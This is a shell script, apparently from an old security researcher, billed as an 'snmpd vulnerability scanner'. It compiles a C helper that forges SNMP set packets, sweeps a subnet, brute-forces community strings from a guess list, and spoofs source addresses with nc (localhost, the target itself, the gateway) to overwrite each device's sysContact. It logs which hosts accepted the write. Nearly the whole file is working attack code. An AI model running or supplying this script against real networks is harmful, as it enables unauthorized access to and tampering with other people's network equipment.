#!/bin/sh

rm -f .walk.tmp* /tmp/spoof-* WYSZLO &>/dev/null

echo "snmpd vulnerability scanner by <lcamtuf@ags.pl>"
echo

x=$1
PRE=$2

if [ "$2" = "" ]; then
  echo "Usage: $0 start_at c_subnet"
  echo "example: '$0 0 172.16.1' will scan 172.16.1.0-255."
  echo
  exit 
fi

SPFILE="/tmp/spoof-$$"

cat >$SPFILE.c <<_EOF_
char buf[1000];
char part1[]="0\202\0-\2\1\0\4";
char part2[]="\243\37\2\1\1\2\1\0\2\1\0000\0240\202\0\20\6\10+\6\1\2\1\1\4\0\4\4null";
main(int argc,char**argv) {
  char x=strlen(argv[1]);
  memcpy(buf,part1,sizeof(part1)-1);
  memcpy(buf+sizeof(part1)-1,&x,1);
  strcpy(buf+sizeof(part1),argv[1]);
  memcpy(buf+sizeof(part1)+x,part2,sizeof(part2)-1);
  write(1,buf,x+1+sizeof(part1)+sizeof(part2));
}
_EOF_

echo "Compiling helper application..."

gcc -o $SPFILE $SPFILE.c

test -x $SPFILE || exit

echo "Scan range: $PRE.$x-255..."

if [ "$1" = "0" ]; then
  echo "* Collecting routing information (6 seconds)..."
  /usr/sbin/traceroute -n -f 3 -w 60 $PRE.32 2>/dev/null >.walk.tmp &
  sleep 6 
  killall traceroute &>/dev/null
  awk '{print $2}' .walk.tmp >.walk.tmp2
fi

echo "Starting scan. Outfile is: WYSZLO"

while [ "$x" -lt "256" ]; do
  echo $PRE.$x >>.walk.tmp2
  let x=x+1
done

COMMUNITIES="public private write all monitor agent manager OrigEquipMfr admin default password tivoli openview community snmp snmpd system"

for i in `cat .walk.tmp2`; do
  echo -n "$i: "
  snmpget -R 2 $i public system.sysDescr.0 &>.walk.tmp
  ERR="`grep -c -iE 'refuse|error|timeout|fail|denied|found|acce' .walk.tmp`"
  if [ "$ERR" = "0" ]; then
    echo "OK"
    echo -n "  system: "
    awk -F'"' '{print $2}' .walk.tmp >.walk.tmp2
    SYS="`cat .walk.tmp2`"
    echo "$SYS"
    snmpget -R 2 $i public system.sysDescr.0 &>.walk.tmp
    awk -F'"' '{print $2}' .walk.tmp >.walk.tmp2
    SYSNAME="`awk '{print $1}' .walk.tmp2`"
     echo "$i ($SYS):" >>WYSZLO
     for j in $COMMUNITIES 'all private' 'Secret C0de' $SYSNAME; do
      echo -n "  $j> "
      $SPFILE "$j" | nc -u $i 161 &>/dev/null &
      $SPFILE "$j" | nc -s 127.0.0.1 -u $i 161 &>/dev/null &
      $SPFILE "$j" | nc -s $i -u $i 161 &>/dev/null &
      $SPFILE "$j" | nc -s $PRE.1 -u $i 161 &>/dev/null &
      sleep 1
      killall nc &>/dev/null
      snmpget -R 2 $i public system.sysContact.0 &>.walk.tmp
      WORKED="`grep -c null .walk.tmp 2>/dev/null`"
      if [ "$WORKED" = "0" ]; then
        echo "  - $j failed." >>WYSZLO
        echo "failed."
      else
        echo "OK"
        echo "  - $j WORKED." >>WYSZLO
        break
      fi
    done
  else
    echo "milczy..."
  fi
done

echo "Done."
rm -f .walk.tmp* $SPFILE*